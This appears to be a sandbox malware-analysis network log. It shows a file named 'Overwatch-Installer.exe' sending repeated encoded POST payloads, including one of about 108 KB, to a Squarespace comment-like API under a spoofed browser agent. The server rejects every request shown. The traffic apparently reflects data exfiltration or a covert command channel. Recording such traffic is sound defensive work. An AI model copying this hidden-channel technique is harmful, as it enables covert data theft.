2024-09-01 20:04:26 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:26 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:26 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:26 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:26 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:26 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:26 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZHl15bAlj6mZTlhOTg2MGEyZGI2Y2JmOTBkNWY4MjBlNDI3ZWYy; Path=/; Secure Set-Cookie: crumb=BfPWsDhuz0gyNTU2MWE3M2M1OWE4YzUyMTJjYzAxMjllZTlhNWE2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: yAsoTVtr/nwsdw6tl Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfPWsDhuz0gyNTU2MWE3M2M1OWE4YzUyMTJjYzAxMjllZTlhNWE2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49744	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:26 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:26 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:26 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:27 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:26 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BWQTGyhVL9dwYzdiZTFmMjdkMmRmYmQzYzhiYTVkZGUzNTI1ZjQ1; Path=/; Secure Set-Cookie: crumb=BbXJvlYvboKYNmNiYjZhMTkzNjUxNjMxMDE2NWNjNWIwOTY2MmVi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: E7QjkWbN/WwzIyRhx Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BbXJvlYvboKYNmNiYjZhMTkzNjUxNjMxMDE2NWNjNWIwOTY2MmVi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49745	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:27 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:27 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:27 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:27 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:27 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVGKyyTx6OUtM2E5OGZjNTNjOTdmN2NhOGM0NWM5ZDliMDg4ZmUw; Path=/; Secure Set-Cookie: crumb=BX3N89ng1DpIYmM5Y2YwZjViZWUwNzRhZGU3MGEyYzg5ZmM0ZDNh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Qo4IUUJc/VWjz1eDV Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BX3N89ng1DpIYmM5Y2YwZjViZWUwNzRhZGU3MGEyYzg5ZmM0ZDNh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49746	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:27 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:28 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:28 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:28 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:27 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZLb8n2wTu-uNjY2ZGViZjkzM2E5MGJlNjUxNTUwYWY3MGY2Yjg4; Path=/; Secure Set-Cookie: crumb=BSKz1IaSrfYQMDA4ZDAwNGUzNTg5YWI1ZmY3MWVkZWY4ZTM1NWZm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: EVr0iqd6/o6b1mwBx Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BSKz1IaSrfYQMDA4ZDAwNGUzNTg5YWI1ZmY3MWVkZWY4ZTM1NWZm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49747	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:28 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:28 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:28 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:28 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:28 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfE4EO70RWCWYmRjNGE2NWI3MzgxYjc5NzYwZjg4N2JmYmZlNDVj; Path=/; Secure Set-Cookie: crumb=BVdWLCI53ztZNWM3MWYzMDJmYTUxZmI3MmE1OGRlNDY3ZTk2Mjg5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: SG9y0w0W/syiEw0zm Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BVdWLCI53ztZNWM3MWYzMDJmYTUxZmI3MmE1OGRlNDY3ZTk2Mjg5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49748	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:28 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:28 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:28 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:29 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:28 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQwQd8eSPsh8YWZiODgzN2EyMDNlNzQyM2UxNzlmNjZjYmZjNTYw; Path=/; Secure Set-Cookie: crumb=BYx6-svVf35lYmExOWE2Zjc1NjgzOTZlM2U2N2Q0ZTIyNTdkOThl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: EetwCegr/aBVG3PBq Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYx6-svVf35lYmExOWE2Zjc1NjgzOTZlM2U2N2Q0ZTIyNTdkOThl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49749	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:29 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:29 UTC	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49752	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:29 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108470 Expect: 100-continue
2024-09-01 20:04:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:29 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:29 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 69 52 6d 63 75 33 66 75 4a 25 32 42 55 32 30 4f 31 79 54 34 65 6b 75 77 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9iRmcu3fuJ%2BU20O1yT4ekuwgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7M
2024-09-01 20:04:29 UTC	1	OUT	Data Raw: 6f Data Ascii: o
2024-09-01 20:04:29 UTC	16306	OUT	Data Raw: 78 35 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 Data Ascii: x5%2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BC
2024-09-01 20:04:29 UTC	1	OUT	Data Raw: 75 Data Ascii: u
2024-09-01 20:04:29 UTC	16306	OUT	Data Raw: 56 37 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 Data Ascii: V7HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMts
2024-09-01 20:04:29 UTC	1	OUT	Data Raw: 5a Data Ascii: Z
